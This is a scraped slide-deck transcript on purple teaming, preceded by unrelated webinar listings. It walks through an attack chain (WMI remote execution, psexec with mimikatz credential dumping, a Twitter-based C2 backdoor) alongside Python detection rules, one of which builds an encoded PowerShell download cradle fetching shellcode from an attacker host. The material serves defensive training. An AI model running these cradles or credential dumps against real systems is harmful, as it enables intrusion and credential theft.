Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Fueling AI with Great Data with Airbyte Webinar
Zilliz
This talk will focus on how to collect data from a variety of sources, leveraging this data for RAG and other GenAI use cases, and finally charting your course to productionalization.
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Skybuffer SAM4U tool for SAP license adoptionTatiana Kojar
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
Generating privacy-protected synthetic data using Secludy and Milvus
Purple View
1. Purple View
The recent trend of using Attack and Defense Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
2. Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science (Security/Privacy)
Interested in both sides of security
Loooooves presenting
3. Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defenders View
○ Possible Purple Team exercises
4. Definitions
Exploit - Code or technique that abuses a vulnerability to gain unauthorized access to a system
Payload - The code that runs once access is gained (e.g. a shell or a single command)
Metasploit - An open source, modular exploitation framework
Meterpreter - An advanced, extensible Metasploit payload that uses in-memory DLL injection and resides entirely in memory
Shell - Remote terminal/CMD access to the target
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
5. Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
6. Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
7. Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
8. Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
9. Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
10. Purple Team - Offensive & Defensive
Different types of Purple Teaming (categories from cobaltstrike.com):
● Red Team sitting with the Network Defense team
● Adversary Simulation
● Traffic Generation
● Wargaming
Requires a total picture involving all areas of the organization
11. Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
12. Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
13. Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not simply turn off servers or block IP addresses to cut the exercise short; keep it realistic so the full attack chain can be observed
14. Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
15. Purple Team - DEMO (step by step)
Our exercise
17. Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
20. Flash Exploits
● Flash Player plugins are a frequent exploit target
○ JavaScript or a binary can be embedded within a Flash (SWF) file
○ ActionScript defines events that redirect the victim to the landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default with many browsers
● New vulnerabilities are identified on almost a weekly basis
30. B: What can you take away
Security Onion - free; implement it
Ships with Snort rules for Flash exploits (they need to be installed/enabled)
Confirm whether Flash is needed for business reasons
Keep Flash updated
Example signatures for the CVE-2015-5119 Flash exploit chain (note: ETPRO rules belong to the paid Emerging Threats Pro set; the ET Open ruleset Security Onion pulls by default does not include them):
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
31. Purple Team - Exercise
● Blue team understands how attackers gain initial access
● Flash exploits - an ongoing issue
● Helps the blue team identify suspicious traffic and understand what is happening from the attacker's perspective
● Red team sees how its attacks are visible to the blue team and can think of ways to make them stealthier
37. PowerView
Active Directory enumeration tool by @harmj0y, hosted in the PowerShellEmpire PowerTools repo (later merged into PowerSploit) and shipped as a PowerShell Empire module
Very powerful for mapping users, groups, hosts and logon sessions in a domain
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
38. A: Lateral Movement
Reusing the same local Administrator account password on multiple computers.
Source: Sean Metcalf
https://adsecurity.org/?p=1684
42. A: Base64 Encoding Payload
Base64-encode the PowerShell payload (passed with -EncodedCommand) to avoid quoting and whitespace problems on the command line
Technique from The Hacker Playbook 1 (now 2)
http://thehackerplaybook.com/dashboard/
43. A: Hosting PowerSploit Invoke-Shellcode.ps1
PowerSploit code hosted on the local Kali machine and served over HTTP
44. A: Invoke-WmiMethod
Use PowerShell to connect to the remote host, create a new process and launch the IEX download cradle.
Invoke-WmiMethod calls Windows Management Instrumentation (WMI) methods, locally or remotely.
The Create method of the Win32_Process WMI class starts a process on the target; it runs under the WMI provider host (WmiPrvSE.exe), which is the parent process a defender sees.
45. A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
46. A: Client1 gives same password
Same password across multiple clients
54. B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
55. B: What can you take away
Event correlation - based on event ID, source and destination for remote connections
Implement alerting on combinations of Security events rather than on any single event
A SIEM can, and SHOULD, do this
Use LOG-MD - a really good logging and audit tool, especially for PowerShell
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
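The Python below is an added example, not code from the deck or from any tool it names. It shows both halves of what slides 42 to 55 describe: the attacker side encodes an IEX download cradle the way PowerShell's -EncodedCommand expects it (base64 over UTF-16LE, not UTF-8, which is the usual mistake), and the defender side runs two correlation rules over a handful of constructed Windows Security events: decode any -EncodedCommand found in a 4688 process-creation event and flag download cradles, and flag powershell.exe spawned by WmiPrvSE.exe on a host that received a network logon (4624, logon type 3) from another machine shortly before, which is the footprint of a remote Invoke-WmiMethod Win32_Process Create. The Kali URL, host names, IPs and the simplified event field names are assumptions.

```python
import base64
import re
from datetime import datetime, timedelta

# --- Attacker side (slides 42/44) -------------------------------------------
# PowerShell's -EncodedCommand expects base64 over UTF-16LE text, not UTF-8.
# Encoding removes the quoting/whitespace headaches of passing a one-liner
# through WMI, psexec or a batch file.
def encode_powershell(command: str) -> str:
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_powershell(encoded: str) -> str:
    return base64.b64decode(encoded).decode("utf-16-le")

# Hypothetical Kali host serving PowerSploit on port 80 (slides 43 and 54).
KALI_URL = "http://10.0.0.5/Invoke-Shellcode.ps1"
CRADLE = f"IEX (New-Object Net.WebClient).DownloadString('{KALI_URL}')"

# --- Defender side (slide 55) ------------------------------------------------
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc ...).
ENC_RE = re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient", re.I)

def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def rule_encoded_cradle(events):
    """Rule 1: decode -EncodedCommand in 4688 (process creation) events and
    flag download cradles. Returns (host, decoded command) pairs."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        m = ENC_RE.search(e["cmdline"])
        if not m:
            continue
        try:
            decoded = decode_powershell(m.group(1))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16LE; out of scope for this rule
        if CRADLE_RE.search(decoded):
            hits.append((e["host"], decoded))
    return hits

def rule_wmi_after_network_logon(events, window=timedelta(minutes=5)):
    """Rule 2: powershell.exe spawned by WmiPrvSE.exe (the provider host that
    Win32_Process.Create runs under) on a host that received a network logon
    (4624, logon type 3) from another machine within `window` before: the
    remote Invoke-WmiMethod pattern. Returns (source IP, target host, account)."""
    logons = [e for e in events if e["id"] == 4624 and e["logon_type"] == 3]
    hits = []
    for e in events:
        if e["id"] != 4688 or e["parent"].lower() != "wmiprvse.exe":
            continue
        if not e["process"].lower().endswith("powershell.exe"):
            continue
        t = parse_time(e["time"])
        for l in logons:
            if l["host"] == e["host"] and timedelta(0) <= t - parse_time(l["time"]) <= window:
                hits.append((l["src_ip"], e["host"], l["account"]))
    return hits

# Constructed sample events. Field names are a simplification of what the
# Windows Security log carries, not its exact schema.
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2016-03-01 22:14:03", "host": "CLIENT2",
     "account": "Administrator", "logon_type": 3, "src_ip": "192.168.1.10"},
    {"id": 4688, "time": "2016-03-01 22:14:07", "host": "CLIENT2",
     "parent": "WmiPrvSE.exe",
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE)},
    # Benign: an admin running an encoded but harmless command from Explorer.
    {"id": 4688, "time": "2016-03-01 09:05:00", "host": "CLIENT1",
     "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -enc " + encode_powershell("Get-Process")},
]

def run(events=SAMPLE_EVENTS):
    return {"cradles": rule_encoded_cradle(events),
            "wmi_lateral": rule_wmi_after_network_logon(events)}

if __name__ == "__main__":
    for name, hits in run().items():
        print(name, hits)
```

Rule 2 deliberately keys on the parent process and the preceding network logon rather than on the cradle text, so it still fires when the red team obfuscates the payload; rule 1 catches the cradle itself. Command-line logging for 4688 must be enabled (Audit Process Creation plus the "Include command line in process creation events" policy) or the cmdline field is empty.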
56. Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
58. A: Local Admin to Domain Admin
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over active directory!
● Access IT resources
● Create accounts
● Propagate malware
59. A: Local Admin to Domain Admin
60. A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
61. A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
62. A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
67. B: What can you take away
● Prevention:
○ Access control for the shares used to copy tools across (e.g. admin$)
○ Limit who can run psexec and monitor its use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - event correlation between system logs and network proxy logs
○ For lateral movement: enable file share access auditing (e.g. Event ID 5140, a network share object was accessed)
○ Canary accounts - honey accounts that are never used legitimately, so any logon attempt is an alert
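Two of the detections listed above, the psexec pattern from slides 60 to 61 and the canary accounts, as an added Python example (not code from the deck). It correlates constructed events: a 5140 network share access to an administrative share followed within a short window by a 7045 "service was installed" event on the same host, which is what psexec leaves when it copies PSEXESVC.exe over admin$ and starts it, and any authentication event (4624, 4625, 4768) naming a designated honey account. The rule matches on any newly installed service rather than on the name PSEXESVC, because psexec -r renames it. Host names, IPs, the honey account name and the simplified field names are assumptions.

```python
from datetime import datetime, timedelta

# Hypothetical honey account: created for detection only, never used legitimately.
CANARY_ACCOUNTS = {"svc_backup_admin"}
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}

def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def share_name(path: str) -> str:
    # 5140 records the share as \\*\ADMIN$; keep the part after the last backslash.
    return path.rsplit("\\", 1)[-1].upper()

def rule_psexec(events, window=timedelta(seconds=60)):
    """Administrative share accessed over the network (5140), then a new
    service installed on the same host (7045) within `window`: the psexec
    pattern. The share event carries the source IP and account; the service
    event carries the binary that was started."""
    shares = [e for e in events if e["id"] == 5140 and share_name(e["share"]) in ADMIN_SHARES]
    hits = []
    for svc in events:
        if svc["id"] != 7045:
            continue
        t = parse_time(svc["time"])
        for sh in shares:
            dt = t - parse_time(sh["time"])
            if sh["host"] == svc["host"] and timedelta(0) <= dt <= window:
                hits.append({"target": svc["host"], "src_ip": sh["src_ip"],
                             "account": sh["account"], "service": svc["service"],
                             "image": svc["image"]})
    return hits

def rule_canary(events):
    """Any logon success, failure or Kerberos TGT request for a canary account
    is an alert; the only way to know its name is to have dumped it."""
    names = {a.lower() for a in CANARY_ACCOUNTS}
    return [(e["id"], e["host"], e.get("src_ip")) for e in events
            if e["id"] in (4624, 4625, 4768) and e["account"].lower() in names]

# Constructed sample events (simplified field names, not the exact Windows schema).
SAMPLE_EVENTS = [
    {"id": 5140, "time": "2016-03-01 22:20:01", "host": "CLIENT2", "account": "Administrator",
     "src_ip": "192.168.1.10", "share": r"\\*\ADMIN$"},
    {"id": 7045, "time": "2016-03-01 22:20:03", "host": "CLIENT2", "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe"},
    # Benign: a user browsing an ordinary file share, no service follows.
    {"id": 5140, "time": "2016-03-01 10:00:00", "host": "FILESRV", "account": "jdoe",
     "src_ip": "192.168.1.20", "share": r"\\*\Finance"},
    # The honey account is tried from a workstation after the credential dump.
    {"id": 4625, "time": "2016-03-01 22:31:00", "host": "DC1", "account": "svc_backup_admin",
     "src_ip": "192.168.1.11"},
]

def run(events=SAMPLE_EVENTS):
    return {"psexec": rule_psexec(events), "canary": rule_canary(events)}

if __name__ == "__main__":
    for name, hits in run().items():
        print(name, hits)
```

5140 only appears when "Audit File Share" (Object Access) auditing is enabled on the endpoints, and 7045 lives in the System log rather than Security, so the SIEM use case has to pull both channels.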
68. Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been considered
○ Learns how an attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind by this attack and possibly how to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Can provide more thorough recommendations
77. B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
78. B: Twittor - Client system
Backdoor as Python Executable compiled with --no-console flag to hide output
79. B: Traffic from Client
Reaches out to Twitter
Source and destination are internal IPs; the client sends to the API
80. B: What can you take away
Check for remote connections after hours; are they against policy?
Again, correlate logs with known C2 addresses
See whether AV picks the backdoor up
81. Purple Team - Benefits
Test whether a C2 channel can reach out to Twitter.
Social media may be blocked in the browser, but the same sites can still be reachable via their APIs.
If it is not blocked, why not? Can your blue team help to stop this channel and others like it?
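Slide 77 asks whether Twittor's polling of the Twitter API looks like normal user traffic. As an added example (not part of the deck or of Twittor), the Python below runs three checks over constructed proxy log lines: the destination is an API host rather than the web site, the requests land outside business hours, and the gaps between requests are too regular for a human (low coefficient of variation), which is how a polling backdoor tends to give itself away even when the destination is a legitimate service. The log format, host names, IPs, business hours and thresholds are assumptions.

```python
import re
from datetime import datetime, time
from statistics import mean, pstdev

# Constructed proxy log lines: timestamp, client IP, method, URL (format is an assumption).
# The first client polls the API every 30 s late at night; the second is a person browsing.
SAMPLE_LOG = """\
2016-03-01 23:00:00 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 23:00:30 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 23:01:00 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 23:01:30 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 23:02:00 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 23:02:30 192.168.1.11 GET https://api.twitter.com/1.1/direct_messages.json
2016-03-01 12:03:10 192.168.1.20 GET https://twitter.com/home
2016-03-01 12:07:44 192.168.1.20 GET https://twitter.com/notifications
2016-03-01 12:18:02 192.168.1.20 GET https://twitter.com/messages
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+)$")
API_HOSTS = {"api.twitter.com"}            # API endpoints a browser-level social media block misses
BUSINESS_HOURS = (time(8, 0), time(18, 0))  # assumed policy window

def parse(log: str):
    rows = []
    for line in log.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, method, url = m.groups()
        host = re.sub(r"^https?://", "", url).split("/", 1)[0]
        rows.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                     "src": src, "host": host, "url": url})
    return rows

def api_hits(rows):
    return [r for r in rows if r["host"] in API_HOSTS]

def after_hours(rows):
    start, end = BUSINESS_HOURS
    return [r for r in rows if not (start <= r["time"].time() < end)]

def beacons(rows, min_requests=6, max_cv=0.2):
    """Group by (client, host) and flag series whose inter-request gaps barely
    vary: coefficient of variation (stdev / mean) at or below `max_cv`."""
    series = {}
    for r in rows:
        series.setdefault((r["src"], r["host"]), []).append(r["time"])
    flagged = []
    for (src, host), times in series.items():
        times.sort()
        if len(times) < min_requests:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            flagged.append({"src": src, "host": host, "period_s": avg, "cv": cv})
    return flagged

def analyse(log: str = SAMPLE_LOG):
    rows = parse(log)
    return {"api": api_hits(rows), "after_hours": after_hours(rows), "beacons": beacons(rows)}

if __name__ == "__main__":
    for name, result in analyse().items():
        print(name, len(result), result[:1])
```

Real backdoors usually add jitter to the poll interval, so tune `max_cv` against a baseline of genuine traffic rather than the 0.2 used here, and treat the API-host and after-hours checks as the corroborating context slide 80 asks for rather than as alerts on their own.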
91. B: What can you take away?
Disable FTP - there should rarely be a genuine business need for it
If there is a business need, whitelist those client IP addresses and create a group of users specifically for FTP
92. Purple Team - Exercise
Clear text - FTP carries credentials and data unencrypted, so anyone on the path can read them
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
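Slide 91's whitelist and slide 92's clear-text question can be checked against a capture without clicking through Wireshark. As an added example (not from the deck), the Python below parses the FTP control-channel text a capture yields (here a constructed, already-reassembled dump in the style of "Follow TCP Stream"), pulls the USER/PASS pair and any uploads out of each session, and rates each login by whether the server is on the approved list. The stream header format, IP addresses, credentials and the allowlist are assumptions.

```python
import re

# Constructed text of two FTP control sessions as a "Follow TCP Stream" dump would show them.
# Each session starts with a "== client:port -> server:port ==" header (format is an assumption).
SAMPLE_STREAMS = """\
== 192.168.1.11:50112 -> 10.0.0.5:21 ==
220 (vsFTPd 3.0.2)
USER backup
331 Please specify the password.
PASS Summer2016!
230 Login successful.
PORT 192,168,1,11,196,10
STOR payroll.xlsx
== 192.168.1.30:51000 -> 192.168.1.200:21 ==
220 Welcome
USER scanner
331 Password required
PASS scan123
230 Logged in
"""

APPROVED_FTP_SERVERS = {"192.168.1.200"}   # hypothetical business-approved FTP host

HEADER_RE = re.compile(r"^== (\S+):\d+ -> (\S+):\d+ ==$")

def parse_sessions(text: str):
    """Split the dump into sessions and pull out the clear-text FTP commands of interest."""
    sessions, cur = [], None
    for line in text.strip().splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = {"client": m.group(1), "server": m.group(2), "user": None,
                   "password": None, "logged_in": False, "uploads": []}
            sessions.append(cur)
            continue
        if cur is None:
            continue
        cmd, _, arg = line.partition(" ")   # FTP commands are "VERB argument"; only the first space splits
        if cmd == "USER":
            cur["user"] = arg
        elif cmd == "PASS":
            cur["password"] = arg            # travels in the clear: the point of slide 92
        elif cmd == "STOR":
            cur["uploads"].append(arg)       # outbound file, relevant to exfiltration
        elif line.startswith("230"):        # server reply: login accepted
            cur["logged_in"] = True
    return sessions

def findings(sessions):
    """One finding per session that exposed a password. A successful login to a
    server outside the allowlist is the case the whitelist control should have blocked."""
    out = []
    for s in sessions:
        if s["password"] is None:
            continue
        approved = s["server"] in APPROVED_FTP_SERVERS
        severity = "high" if s["logged_in"] and not approved else "medium"
        out.append({"client": s["client"], "server": s["server"], "user": s["user"],
                    "approved": approved, "uploads": s["uploads"], "severity": severity})
    return out

def run(text: str = SAMPLE_STREAMS):
    return findings(parse_sessions(text))

if __name__ == "__main__":
    for f in run():
        print(f)
```

Even the "medium" finding is a credential in the clear that any host on the path could harvest, which is why the slide's first recommendation is to disable FTP rather than to allowlist it.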
94. Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
95. Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● Powershell/WMI for blue team
● More advanced attacks, persistence using Powershell Empire
98. Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
100. A: Downloads PowerShell file
Client2 reaches out to Kali machine